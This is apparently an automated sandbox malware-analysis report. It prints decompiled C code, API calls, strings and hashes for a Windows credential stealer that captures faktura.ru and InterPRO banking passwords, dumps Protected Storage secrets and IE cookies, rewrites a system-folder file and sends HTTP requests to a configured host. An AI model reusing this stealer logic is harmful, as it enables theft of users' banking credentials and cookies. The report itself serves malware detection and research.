        0x0040581c

        APIs
        • GetDlgItem.USER32(?,00000001), ref: 00405731
        • GetDlgItem.USER32(?,00000002), ref: 00405742
        • GetDlgItem.USER32(?,00000065), ref: 00405753
        • GetDlgItemTextA.USER32(?,00000066,?,00000063), ref: 0040576A
          • Part of subcall function 0040C34D: GetWindowTextW.USER32(?,?,00000064), ref: 0040C37B
          • Part of subcall function 0040C34D: StrStrW.SHLWAPI(?,?,?,00000000), ref: 0040C390
          • Part of subcall function 0040C34D: GetDlgItem.USER32(?,00000001), ref: 0040C3A1
          • Part of subcall function 0040C34D: GetDlgItem.USER32(?,00000002), ref: 0040C3B2
          • Part of subcall function 0040C34D: GetDlgItem.USER32(?,00000142), ref: 0040C3C6
          • Part of subcall function 0040C34D: GetDlgItem.USER32(?,00000396), ref: 0040C3D6
          • Part of subcall function 0040C34D: GetDlgItemTextA.USER32(?,00000124,?,0000000D), ref: 0040C3EC
          • Part of subcall function 0040C34D: GetDlgItemTextA.USER32(?,00000125,?,00000032), ref: 0040C40A
          • Part of subcall function 0040C34D: lstrcpy.KERNEL32(rlappedAccessResults,?), ref: 0040C422
          • Part of subcall function 0040C34D: lstrcpy.KERNEL32(ults,?), ref: 0040C434
        • GetDlgItem.USER32(?,00000001), ref: 0040578F
        • GetDlgItem.USER32(?,00000002), ref: 0040579C
        • GetDlgItem.USER32(?,000000CB), ref: 004057AD
        • GetDlgItem.USER32(?,000000F0), ref: 004057BD
        • GetDlgItem.USER32(?,000000F1), ref: 004057CD
        • GetDlgItemTextA.USER32(?,000000CB,?,00000063), ref: 004057DF
        • EndDialog.USER32(?,?), ref: 00405812
        Strings
        • InterPRO Key password: %S, xrefs: 0040577D
        • faktura.ru dataPassword: %S, xrefs: 004057EE
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Item$Text$lstrcpy$DialogWindow
        • String ID: InterPRO Key password: %S$faktura.ru dataPassword: %S
        • API String ID: 3374916993-340622018
        • Opcode ID: e8bf784995addf7507c27900898e33d4082b556ea7dcb9a42c3a9e2d94f816d8
        • Instruction ID: 0586d66cce4394d28ea56948a0ce184660821f1b39f7dfa7ce38c5a733cb4589
        • Opcode Fuzzy Hash: e8bf784995addf7507c27900898e33d4082b556ea7dcb9a42c3a9e2d94f816d8
        • Instruction Fuzzy Hash: 89217C32381A14BAE6216B608D49FEB365DDF42B80F248436F908F91D0DB79CA118A7D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00407126, Relevance: 22.8, APIs: 15, Instructions: 272fileCOMMON
        Download Yara Rule
        C-Code - Quality: 95%
        			E00407126(void* _a4) {
				void* _v8;
				long _v12;
				long _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _v28;
				char* _v32;
				intOrPtr* _v36;
				void* _v40;
				short _v560;
				void* __edi;
				void* __esi;
				intOrPtr _t71;
				void* _t75;
				long _t76;
				intOrPtr _t83;
				char* _t85;
				signed int _t103;
				long _t104;
				signed int _t111;
				intOrPtr _t112;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t119;
				intOrPtr _t122;
				void* _t128;
				intOrPtr _t136;
				void* _t137;
				void* _t144;
				void* _t146;
				void* _t148;
				void* _t149;
				signed int _t151;
				void* _t152;
				intOrPtr* _t153;

				 *0x414b58(0,  &_v560, 0x25, 1);
				_t71 =  *0x414ad4; // 0x241f5a8
				PathCombineW( &_v560,  &_v560,  *(_t71 + 0x158));
				_t75 = CreateFileW( &_v560, 0xc0000000, 1, 0, 4, 0, 0);
				_t149 = _t75;
				_v8 = _t149;
				if(_t149 == 0xffffffff) {
					return _t75;
				}
				_t76 = GetFileSize(_t149, 0);
				_v12 = _t76;
				if(_t76 == 0) {
					L59:
					return CloseHandle(_v8);
				}
				_t144 = E0040F14B(_t76);
				_v40 = _t144;
				if(_t144 == 0) {
					L58:
					goto L59;
				}
				if(ReadFile(_t149, _t144, _v12,  &_v12, 0) == 0) {
					L57:
					E0040F15E(_v40);
					goto L58;
				}
				_t83 = E0040A6D2(_v12, _t144,  &_v12);
				_v24 = _t83;
				if(_t83 == 0) {
					goto L57;
				} else {
					_v28 = _a4;
					while(1) {
						_t85 = E0040F968(_v28, 1);
						_v32 = _t85;
						if(_t85 == 0) {
							break;
						} else {
							if( *_t85 == 0x21) {
								_v32 = _t85 + 1;
							}
						}
						_t111 = 0;
						_v20 = 0;
						if(_v12 <= 0) {
							L41:
							_t112 = E0040F968(_v28, 2);
							_v28 = _t112;
							if(_t112 != 0) {
								continue;
							}
							break;
						} else {
							goto L10;
						}
						do {
							L10:
							_t113 = _v24 + _t111 * 4;
							_v36 = _t113;
							_t114 =  *_t113;
							if(_t114 != 0) {
								_t153 = _t114;
								while(1) {
									_t116 =  *_t153;
									if(_t116 != 0x20 && _t116 != 9) {
										break;
									}
									_t153 = _t153 + 1;
								}
								_t117 =  *_t153;
								if(_t117 != 0x23 && _t117 != 0xd && _t117 != 0xa && _t117 != 0) {
									while(_t117 != 9) {
										if(_t117 == 0x20 || _t117 == 9) {
											break;
										} else {
											if(_t117 == 0) {
												goto L40;
											}
											_t153 = _t153 + 1;
											_t117 =  *_t153;
											continue;
										}
									}
									if( *_t153 == 0) {
										goto L40;
									} else {
										goto L26;
									}
									while(1) {
										L26:
										_t118 =  *_t153;
										if(_t118 != 9 && _t118 != 0x20) {
											break;
										}
										_t153 = _t153 + 1;
									}
									_t119 =  *_t153;
									if(_t119 != 0x23 && _t119 != 0xd && _t119 != 0xa && _t119 != 0) {
										_t148 = E0040F637(_v32);
										if(E0040F65D(_t120, _t153, _t148, _v32) == 0) {
											_t122 =  *((intOrPtr*)(_t148 + _t153));
											if(_t122 == 0x20 || _t122 == 0xd || _t122 == 0xa || _t122 == 0x23 || _t122 == 0) {
												E0040F15E( *_v36);
												 *_v36 = 0;
											}
										}
									}
								}
							}
							L40:
							_t111 = _v20 + 1;
							_v20 = _t111;
						} while (_t111 < _v12);
						goto L41;
					}
					_v20 = _v20 | 0xffffffff;
					SetFilePointer(_v8, 0, 0, 0);
					SetEndOfFile(_v8);
					_t151 = 0;
					if(_v12 <= 0) {
						L46:
						_t146 = _a4;
						_t152 = "\r\n";
						do {
							_t128 = E0040F968(_t146, 1);
							if(_t128 == 0) {
								break;
							}
							if( *_t128 != 0x21) {
								if(_t146 == _a4) {
									_t103 = _v20;
									if(_t103 != 0xffffffff) {
										_t136 =  *((intOrPtr*)(_v24 + _t103 * 4));
										_t104 = E0040F637(_t136);
										_v16 = _t104;
										if(_t104 != 0 &&  *((char*)(_t136 + _t104 - 1)) != 0xa) {
											WriteFile(_v8, _t152, 2,  &_v16, 0);
										}
									}
								}
								WriteFile(_v8, _t146, E0040F637(_t146),  &_v16, 0);
								WriteFile(_v8, " ", 1,  &_v16, 0);
								WriteFile(_v8, _t128, E0040F637(_t128),  &_v16, 0);
								WriteFile(_v8, _t152, 2,  &_v16, 0);
							}
							_t146 = E0040F968(_t146, 2);
						} while (_t146 != 0);
						FlushFileBuffers(_v8);
						E0040F17A(_v12, _v24);
						goto L57;
					} else {
						goto L43;
					}
					do {
						L43:
						_t137 =  *(_v24 + _t151 * 4);
						if(_t137 != 0) {
							_v20 = _t151;
							WriteFile(_v8, _t137, E0040F637(_t137),  &_v16, 0);
						}
						_t151 = _t151 + 1;
					} while (_t151 < _v12);
					goto L46;
				}
			}









































        0x0040713f
        0x00407145
        0x00407158
        0x00407171
        0x00407177
        0x00407179
        0x0040717f
        0x00407418
        0x00407418
        0x00407187
        0x0040718d
        0x00407192
        0x0040740c
        0x00000000
        0x0040740f
        0x0040719e
        0x004071a0
        0x004071a5
        0x0040740b
        0x00000000
        0x0040740b
        0x004071bd
        0x00407403
        0x00407406
        0x00000000
        0x00407406
        0x004071cb
        0x004071d0
        0x004071d5
        0x00000000
        0x004071db
        0x004071de
        0x004071e1
        0x004071e6
        0x004071eb
        0x004071f0
        0x00000000
        0x004071f6
        0x004071f9
        0x004071fc
        0x004071fc
        0x004071f9
        0x004071ff
        0x00407201
        0x00407207
        0x004072cb
        0x004072d0
        0x004072d5
        0x004072da
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040720d
        0x0040720d
        0x00407210
        0x00407213
        0x00407216
        0x0040721a
        0x00407220
        0x00407222
        0x00407222
        0x00407226
        0x00000000
        0x00000000
        0x0040722c
        0x0040722c
        0x0040722f
        0x00407233
        0x00407256
        0x00407249
        0x00000000
        0x0040724f
        0x00407251
        0x00000000
        0x00000000
        0x00407253
        0x00407254
        0x00000000
        0x00407254
        0x00407249
        0x0040725c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040725e
        0x0040725e
        0x0040725e
        0x00407262
        0x00000000
        0x00000000
        0x00407268
        0x00407268
        0x0040726b
        0x0040726f
        0x00407285
        0x00407293
        0x00407295
        0x0040729a
        0x004072b1
        0x004072b9
        0x004072b9
        0x0040729a
        0x00407293
        0x0040726f
        0x00407233
        0x004072bb
        0x004072be
        0x004072bf
        0x004072c2
        0x00000000
        0x0040720d
        0x004072e0
        0x004072ea
        0x004072f3
        0x004072f9
        0x004072fe
        0x00407328
        0x00407328
        0x0040732b
        0x00407330
        0x00407339
        0x0040733d
        0x00000000
        0x00000000
        0x00407346
        0x0040734f
        0x00407351
        0x00407357
        0x0040735c
        0x0040735f
        0x00407364
        0x00407369
        0x0040737e
        0x0040737e
        0x00407369
        0x00407357
        0x00407396
        0x004073ac
        0x004073c4
        0x004073d6
        0x004073d6
        0x004073e5
        0x004073e7
        0x004073f2
        0x004073fe
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00407300
        0x00407300
        0x00407303
        0x00407308
        0x0040730f
        0x0040731c
        0x0040731c
        0x00407322
        0x00407323
        0x00000000
        0x00407300

        APIs
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000001,00000000,01020716), ref: 0040713F
        • PathCombineW.SHLWAPI(?,?,?), ref: 00407158
        • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000000,00000000), ref: 00407171
        • GetFileSize.KERNEL32(00000000,00000000), ref: 00407187
        • CloseHandle.KERNEL32(?), ref: 0040740F
          • Part of subcall function 0040F14B: RtlAllocateHeap.NTDLL(00000008,?,0040ACF9), ref: 0040F157
        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 004071B5
        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000001), ref: 004072EA
        • SetEndOfFile.KERNEL32(?), ref: 004072F3
        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040731C
        • WriteFile.KERNEL32(?,004020A0,00000002,?,00000000,00000001), ref: 0040737E
        • WriteFile.KERNEL32(?,?,00000000,?,00000000,00000001), ref: 00407396
        • WriteFile.KERNEL32(?,0040208C,00000001,?,00000000), ref: 004073AC
        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073C4
        • WriteFile.KERNEL32(?,004020A0,00000002,?,00000000), ref: 004073D6
        • FlushFileBuffers.KERNEL32(?,00000001), ref: 004073F2
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Write$Path$AllocateBuffersCloseCombineCreateFlushFolderHandleHeapPointerReadSizeSpecial
        • String ID:
        • API String ID: 3438174515-0
        • Opcode ID: 9a247c4bc7344257f447d6f433be9b43e40eb419db6b05d0f766e1176a666fb9
        • Instruction ID: b1da6c2c6bea634a31ecf0bbe143e4f366292d7a83a1fa481e9b416ce26f68f7
        • Opcode Fuzzy Hash: 9a247c4bc7344257f447d6f433be9b43e40eb419db6b05d0f766e1176a666fb9
        • Instruction Fuzzy Hash: 14916E71D04209AFDF219BA4CC85BEE7BB9AB45304F1440BAF941B72D0C7786D42DB6A
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00404FFB, Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 326libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 88%
        			E00404FFB() {
				int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v68;
				char _v72;
				int _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				int _v92;
				char _v100;
				void* _v104;
				char _v108;
				intOrPtr* _v116;
				intOrPtr* _v128;
				intOrPtr* _v132;
				char _v136;
				intOrPtr* _v144;
				char _v148;
				char _v164;
				intOrPtr* _v168;
				intOrPtr* _v172;
				char _v180;
				intOrPtr* _v188;
				char _v196;
				int _v204;
				char _v208;
				WCHAR* _v212;
				intOrPtr _v216;
				char _v224;
				short _v232;
				int _v236;
				intOrPtr _v240;
				short _v244;
				short* _v252;
				short _v256;
				char* _v260;
				short _v264;
				intOrPtr _v272;
				void* __edi;
				_Unknown_base(*)()* _t123;
				intOrPtr _t126;
				intOrPtr _t133;
				intOrPtr* _t140;
				intOrPtr* _t142;
				intOrPtr* _t144;
				intOrPtr* _t146;
				short _t147;
				intOrPtr* _t148;
				short _t149;
				intOrPtr* _t150;
				short _t151;
				intOrPtr* _t152;
				short _t153;
				WCHAR* _t155;
				short _t156;
				short _t157;
				char* _t161;
				int _t162;
				short _t165;
				char* _t167;
				signed char _t178;
				signed int _t179;
				short* _t181;
				intOrPtr* _t183;
				intOrPtr* _t185;
				intOrPtr* _t187;
				short _t200;
				char _t203;
				short _t221;
				short _t227;
				void* _t228;
				void* _t229;
				short* _t230;
				short _t233;
				short _t235;

				_t123 = GetProcAddress(LoadLibraryA("pstorec.dll"), "PStoreCreateInstance");
				_t233 = 0;
				_v84 = 0;
				_v36 = 0x10;
				_v32 = 2;
				_v28 = 0;
				_v24 = 0;
				_v92 = 0;
				_v76 = 0;
				if(_t123 == 0) {
					L46:
					_v68 = 0;
					_v72 = 0;
					if(E00404EA2(_t192,  &_v72, 1,  &_v68) != 0) {
						_t226 = _v72;
						if(_v72 > 0) {
							_t133 = E0040F117(_t226 + _t233 + 0x32, _v92);
							if(_t133 != 0) {
								_v92 = _t133;
								E0040F19A(E0040F19A(_t133 + _t233, "\nIE Cookies:\n", 0xd) + 0xd, _v80, _t226);
							}
							E0040F15E(_v68);
						}
					}
					_t126 = _v92;
					_t249 = _v92;
					if(_v92 == 0) {
						_t126 = "Empty";
					}
					E0041352B(_t192, _t208, _t249, 1, 0, 0, L"Protected Storage:\n\n%S", _t126);
					E0040F15E(_v92);
					E00404EA2(_t192, 0, 0, 0);
					E004053C0(1);
					return 1;
				}
				_push(0);
				_push(0);
				_push(0);
				_t192 =  &_v84;
				_push( &_v84);
				if( *_t123() != 0) {
					goto L46;
				}
				_t140 = _v100;
				if(_t140 == 0) {
					goto L46;
				}
				_t208 =  &_v72;
				_push( &_v72);
				_push(0);
				_push(0);
				_push(_t140);
				if( *((intOrPtr*)( *_t140 + 0x38))() != 0) {
					L45:
					_t142 = _v116;
					_t192 =  *_t142;
					 *((intOrPtr*)( *_t142 + 8))(_t142);
					goto L46;
				} else {
					while(1) {
						_t144 = _v88;
						_push(0);
						_t208 =  &_v84;
						_push( &_v84);
						_push(1);
						_push(_t144);
						if( *((intOrPtr*)( *_t144 + 0xc))() != 0) {
							break;
						}
						__eflags = _v100 - 0xe161255a;
						if(_v100 != 0xe161255a) {
							continue;
						}
						_t146 = _v132;
						_t147 =  *((intOrPtr*)( *_t146 + 0x3c))(_t146, 0,  &_v100, 0,  &_v108);
						__eflags = _t147;
						if(_t147 != 0) {
							continue;
						}
						while(1) {
							_t148 = _v128;
							_t149 =  *((intOrPtr*)( *_t148 + 0xc))(_t148, 1,  &_v88, 0);
							__eflags = _t149;
							if(_t149 != 0) {
								break;
							}
							_t150 = _v168;
							_t151 =  *((intOrPtr*)( *_t150 + 0x54))(_t150, 0,  &_v136,  &_v104, 0,  &_v148);
							__eflags = _t151;
							if(_t151 != 0) {
								continue;
							}
							_v188 = 0;
							_v204 = 0;
							while(1) {
								_t152 = _v172;
								_t153 =  *((intOrPtr*)( *_t152 + 0xc))(_t152, 1,  &_v196, 0);
								__eflags = _t153;
								if(_t153 != 0) {
									break;
								}
								_t227 = StrStrW(_v212, L":StringData");
								__eflags = _t227;
								if(_t227 == 0) {
									continue;
								}
								__eflags =  *(_t227 + 0x16);
								if( *(_t227 + 0x16) != 0) {
									continue;
								}
								__eflags = _t227 - _v216;
								if(_t227 == _v216) {
									continue;
								}
								_t155 = _v212;
								_t156 =  *((intOrPtr*)( *_t155 + 0x44))(_t155, 0,  &_v180,  &_v148, _v216,  &_v208,  &_v224,  &_v164, 0x10);
								__eflags = _t156;
								if(_t156 != 0) {
									continue;
								}
								_t157 = _v244;
								__eflags = _t157 - 2;
								if(_t157 <= 2) {
									continue;
								}
								__eflags = _t157;
								if(_t157 == 0) {
									continue;
								}
								_t221 = E0040F14B(_t157);
								_v232 = _t221;
								__eflags = _t221;
								if(_t221 == 0) {
									continue;
								}
								 *_t227 = 0;
								_t200 = _v244;
								_t161 =  &(_v260[_t200]);
								_t235 = 0;
								_t228 = 0;
								__eflags =  *(_t161 - 1);
								if( *(_t161 - 1) != 0) {
									L29:
									__eflags = _t200;
									if(_t200 <= 0) {
										L34:
										__eflags =  *((char*)(_t235 + _t221 - 1)) - 0x7c;
										if( *((char*)(_t235 + _t221 - 1)) == 0x7c) {
											_t235 = _t235 - 1;
											__eflags = _t235;
										}
										_t162 = E0040F649(_v252);
										_v236 = _t162;
										_t229 = _t162 + _t235 + _v240;
										_t60 = _t229 + 6; // 0x6
										_t165 = E0040F117(_t60, _v256);
										_v264 = _t165;
										__eflags = _t165;
										if(_t165 != 0) {
											_v256 = _t165;
											_t167 = _t165 + _v240;
											_v260 = _t167;
											WideCharToMultiByte(0, 0, _v252, _v236, _t167, _v236, 0, 0);
											_v260 =  &(_v260[_v236]);
											 *_v260 = 0x20;
											_v260[1] = 0x3d;
											_v260[2] = 0x20;
											_v260 =  &(_v260[3]);
											E0040F19A(_v260, _v232, _t235);
											 *((char*)(_t235 + _v272)) = 0xd;
											 *((char*)(_t235 + _v272 + 1)) = 0xa;
											_t230 = _t229 + 5;
											__eflags = _t230;
											 *((char*)(_t235 + _v272 + 2)) = 0;
											_v252 = _t230;
										}
										E0040F15E(_v232);
										_t233 = _v244;
										continue;
									} else {
										goto L30;
									}
									do {
										L30:
										_t178 =  *((intOrPtr*)(_t228 + _v260));
										__eflags = _t178;
										if(_t178 != 0) {
											_t179 = _t178 & 0x000000ff;
										} else {
											_t179 = 0x7c;
										}
										 *(_t228 + _t221) = _t179;
										_t228 = _t228 + 1;
										_t235 = _t235 + 1;
										__eflags = _t228 - _v244;
									} while (_t228 < _v244);
									goto L34;
								}
								__eflags =  *(_t161 - 2);
								if( *(_t161 - 2) != 0) {
									goto L29;
								}
								__eflags = _t200;
								if(_t200 <= 0) {
									goto L34;
								} else {
									goto L20;
								}
								do {
									L20:
									_t181 =  &(_v260[_t228]);
									_t203 =  *_t181;
									__eflags = _t203;
									if(_t203 != 0) {
										__eflags = _t181[0];
										L24:
										if(__eflags <= 0) {
											 *(_t235 + _t221) = _t203;
										} else {
											WideCharToMultiByte(0, 0, _t181, 1, _t235 + _t221, 1, 0, 0);
											_t221 = _v232;
										}
										goto L27;
									}
									__eflags = _t181[0];
									if(__eflags != 0) {
										goto L24;
									}
									 *(_t235 + _t221) = 0x7c;
									L27:
									_t228 = _t228 + 2;
									_t235 = _t235 + 1;
									__eflags = _t228 - _v244;
								} while (_t228 < _v244);
								goto L34;
							}
							_t183 = _v188;
							 *((intOrPtr*)( *_t183 + 8))(_t183);
						}
						_t185 = _v144;
						 *((intOrPtr*)( *_t185 + 8))(_t185);
					}
					_t187 = _v104;
					 *((intOrPtr*)( *_t187 + 8))(_t187);
					goto L45;
				}
			}
















































































        0x00405018
        0x00405020
        0x00405022
        0x00405026
        0x0040502e
        0x00405036
        0x0040503a
        0x0040503e
        0x00405042
        0x00405048
        0x0040531e
        0x00405329
        0x0040532d
        0x00405338
        0x0040533a
        0x00405340
        0x0040534a
        0x00405351
        0x00405355
        0x0040536f
        0x0040536f
        0x00405378
        0x00405378
        0x00405340
        0x0040537d
        0x00405381
        0x00405385
        0x00405387
        0x00405387
        0x00405396
        0x004053a2
        0x004053ab
        0x004053b2
        0x004053bf
        0x004053bf
        0x0040504e
        0x0040504f
        0x00405050
        0x00405051
        0x00405055
        0x0040505a
        0x00000000
        0x00000000
        0x00405060
        0x00405066
        0x00000000
        0x00000000
        0x0040506e
        0x00405072
        0x00405073
        0x00405074
        0x00405075
        0x0040507b
        0x00405314
        0x00405314
        0x00405318
        0x0040531b
        0x00000000
        0x00405081
        0x004052f0
        0x004052f0
        0x004052f6
        0x004052f7
        0x004052fb
        0x004052fc
        0x004052fe
        0x00405304
        0x00000000
        0x00000000
        0x00405086
        0x0040508e
        0x00000000
        0x00000000
        0x00405094
        0x004050a7
        0x004050aa
        0x004050ac
        0x00000000
        0x00000000
        0x004052cc
        0x004052cc
        0x004052db
        0x004052de
        0x004052e0
        0x00000000
        0x00000000
        0x004050b7
        0x004050cf
        0x004050d2
        0x004050d4
        0x00000000
        0x00000000
        0x004050da
        0x004050de
        0x004052a8
        0x004052a8
        0x004052b7
        0x004052ba
        0x004052bc
        0x00000000
        0x00000000
        0x004050f6
        0x004050f8
        0x004050fa
        0x00000000
        0x00000000
        0x00405100
        0x00405104
        0x00000000
        0x00000000
        0x0040510a
        0x0040510e
        0x00000000
        0x00000000
        0x00405114
        0x0040513b
        0x0040513e
        0x00405140
        0x00000000
        0x00000000
        0x00405146
        0x0040514a
        0x0040514d
        0x00000000
        0x00000000
        0x00405153
        0x00405155
        0x00000000
        0x00000000
        0x00405160
        0x00405162
        0x00405166
        0x00405168
        0x00000000
        0x00000000
        0x00405170
        0x00405173
        0x0040517b
        0x0040517d
        0x0040517f
        0x00405181
        0x00405184
        0x004051d2
        0x004051d2
        0x004051d4
        0x004051f4
        0x004051f4
        0x004051f9
        0x004051fb
        0x004051fb
        0x004051fb
        0x00405200
        0x0040520d
        0x00405213
        0x00405216
        0x00405219
        0x0040521e
        0x00405222
        0x00405224
        0x0040522c
        0x00405230
        0x00405239
        0x00405243
        0x0040524d
        0x00405255
        0x0040525c
        0x00405269
        0x0040526d
        0x00405276
        0x0040527f
        0x00405287
        0x00405290
        0x00405290
        0x00405293
        0x00405297
        0x00405297
        0x0040529f
        0x004052a4
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x004051d6
        0x004051d6
        0x004051da
        0x004051dd
        0x004051df
        0x004051e6
        0x004051e1
        0x004051e3
        0x004051e3
        0x004051e9
        0x004051ec
        0x004051ed
        0x004051ee
        0x004051ee
        0x00000000
        0x004051d6
        0x00405186
        0x00405189
        0x00000000
        0x00000000
        0x0040518b
        0x0040518d
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0040518f
        0x0040518f
        0x00405193
        0x00405195
        0x00405197
        0x00405199
        0x004051a6
        0x004051a9
        0x004051a9
        0x004051c4
        0x004051ab
        0x004051b8
        0x004051be
        0x004051be
        0x00000000
        0x004051a9
        0x0040519b
        0x0040519e
        0x00000000
        0x00000000
        0x004051a0
        0x004051c7
        0x004051c8
        0x004051c9
        0x004051ca
        0x004051ca
        0x00000000
        0x004051d0
        0x004052c2
        0x004052c9
        0x004052c9
        0x004052e6
        0x004052ed
        0x004052ed
        0x0040530a
        0x00405311
        0x00000000
        0x00405311

        APIs
        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00405011
        • GetProcAddress.KERNELBASE(00000000), ref: 00405018
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: IE Cookies:$:StringData$Empty$PStoreCreateInstance$Protected Storage:%S$Z%a$pstorec.dll
        • API String ID: 2574300362-834128494
        • Opcode ID: ead2044e914ad227abff8d213b2a3b49334e44607f3eaf238978758788b6d24c
        • Instruction ID: 248de5676cc0d62576f4b4751e1ee90455c92a47b7ce2d8bebb8d859305aa298
        • Opcode Fuzzy Hash: ead2044e914ad227abff8d213b2a3b49334e44607f3eaf238978758788b6d24c
        • Instruction Fuzzy Hash: F7C17971608341AFD710DF64C884E6BBBE9EFC8308F04896EF485AB291D279DD058F66
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040E312, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162networkstringCOMMON
        Download Yara Rule
        C-Code - Quality: 88%
        			E0040E312(long _a4) {
				void _v8;
				void _v60;
				void _v1084;
				void* __ebx;
				void* __edi;
				char* _t62;
				char* _t67;
				int _t73;
				intOrPtr _t78;
				intOrPtr _t82;
				void* _t101;
				signed int _t103;
				char* _t108;
				void* _t109;
				char* _t110;
				char** _t113;

				E00412C4A();
				_t113 = _a4;
				_t113[3] = 0;
				_t113[1][8] = InternetOpenA( *0x4155d4, 0, 0, 0, 0);
				_t62 = _t113[1];
				_t101 = _t62[8];
				if(_t101 == 0) {
					L19:
					return _t62;
				}
				_t113[1][0xc] = InternetConnectA(_t101, _t113[2][0x10], _t113[2][0x18] & 0x0000ffff, 0, 0, 3, 0, 0);
				_t62 = _t113[1];
				if(_t62[0xc] == 0) {
					goto L19;
				}
				_push(_t109);
				_t110 = E0040C7A9(0,  *_t113, _t109, _t113[2][0x2c]);
				_t67 = _t113[2];
				if(_t67[0xc] != 4) {
					_t103 = 0;
				} else {
					_t103 = 0x800000;
				}
				_t108 = _t110;
				if(_t110 == 0) {
					_t108 = _t67[0x2c];
				}
				_t113[1][0x10] = HttpOpenRequestA(_t113[1][0xc],  &(( *_t113)[0x404]), _t108, 0,  *_t113, 0, _t103 | 0x8004f200, 0);
				E0040F15E(_t110);
				_t73 = _t113[1];
				if( *((intOrPtr*)(_t73 + 0x10)) != 0) {
					_a4 = 0x31;
					if(HttpQueryInfoA(( *_t113)[0x420], 0x80000001,  &_v60,  &_a4, 0) == 0 || _a4 == 0) {
						_t78 =  *0x414ad4; // 0x241f5a8
						 *0x414dd8( &_v60,  *((intOrPtr*)(_t78 + 0x128)));
					}
					_t82 =  *0x414ad4; // 0x241f5a8
					wnsprintfA( &_v1084, 0x3ff,  *(_t82 + 0x12c),  &_v60,  *0x414d10);
					HttpAddRequestHeadersA(_t113[1][0x10],  &_v1084, 0xffffffff, 0xa0000000);
					InternetSetStatusCallback(_t113[1][0x10], E0040E2C9);
					_t73 = HttpSendRequestA(_t113[1][0x10], 0, 0, ( *_t113)[0x418], ( *_t113)[0x41c]);
					if(_t73 != 0) {
						_a4 = 4;
						_v8 = 0;
						_t73 = HttpQueryInfoA(_t113[1][0x10], 0x20000013,  &_v8,  &_a4, 0);
						if(_t73 != 0 && _v8 == 0xc8) {
							_a4 = 0x3ff;
							_t73 = InternetQueryOptionA(_t113[1][0x10], 0x22,  &_v1084,  &_a4);
							if(_t73 != 0 && _a4 > 5) {
								_t73 = E0040D472( &_v1084, _a4);
							}
							_t113[3] = 1;
						}
					}
				}
				return _t73;
			}



















        0x0040e31d
        0x0040e322
        0x0040e32b
        0x0040e33d
        0x0040e340
        0x0040e343
        0x0040e348
        0x0040e500
        0x0040e500
        0x0040e500
        0x0040e369
        0x0040e36c
        0x0040e372
        0x00000000
        0x00000000
        0x0040e37d
        0x0040e386
        0x0040e388
        0x0040e38f
        0x0040e398
        0x0040e391
        0x0040e391
        0x0040e391
        0x0040e39a
        0x0040e39e
        0x0040e3a0
        0x0040e3a0
        0x0040e3c7
        0x0040e3ca
        0x0040e3cf
        0x0040e3d5
        0x0040e3eb
        0x0040e400
        0x0040e407
        0x0040e416
        0x0040e416
        0x0040e426
        0x0040e43e
        0x0040e45b
        0x0040e46c
        0x0040e488
        0x0040e490
        0x0040e4a3
        0x0040e4aa
        0x0040e4b0
        0x0040e4b8
        0x0040e4d3
        0x0040e4d9
        0x0040e4e1
        0x0040e4f3
        0x0040e4f3
        0x0040e4f8
        0x0040e4f8
        0x0040e4b8
        0x0040e490
        0x00000000

        APIs
        • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040E334
        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E360
          • Part of subcall function 0040C7A9: lstrcpy.KERNEL32(00000001,?), ref: 0040C830
        • HttpOpenRequestA.WININET(00000004,?,00000000,00000000,?,00000000,00000000,00000000), ref: 0040E3BD
        • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040E3F8
        • lstrcpy.KERNEL32(?,?), ref: 0040E416
        • wnsprintfA.SHLWAPI ref: 0040E43E
        • HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0040E45B
        • InternetSetStatusCallback.WININET(?,Function_0000E2C9), ref: 0040E46C
        • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 0040E488
        • HttpQueryInfoA.WININET(?,20000013,?,00000031,00000000), ref: 0040E4B0
        • InternetQueryOptionA.WININET(?,00000022,?,00000004), ref: 0040E4D9
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Http$Internet$QueryRequest$InfoOpenlstrcpy$CallbackConnectHeadersOptionSendStatuswnsprintf
        • String ID: 1
        • API String ID: 1779409970-2212294583
        • Opcode ID: 5c1c5d03e7af52288e2152c0f95b010bc506728b7939cea5624a15ade6595df0
        • Instruction ID: bcb5a542184bdc6cd9399a3e405025aeb52da0a50a59e3903fa66fa8e49580a7
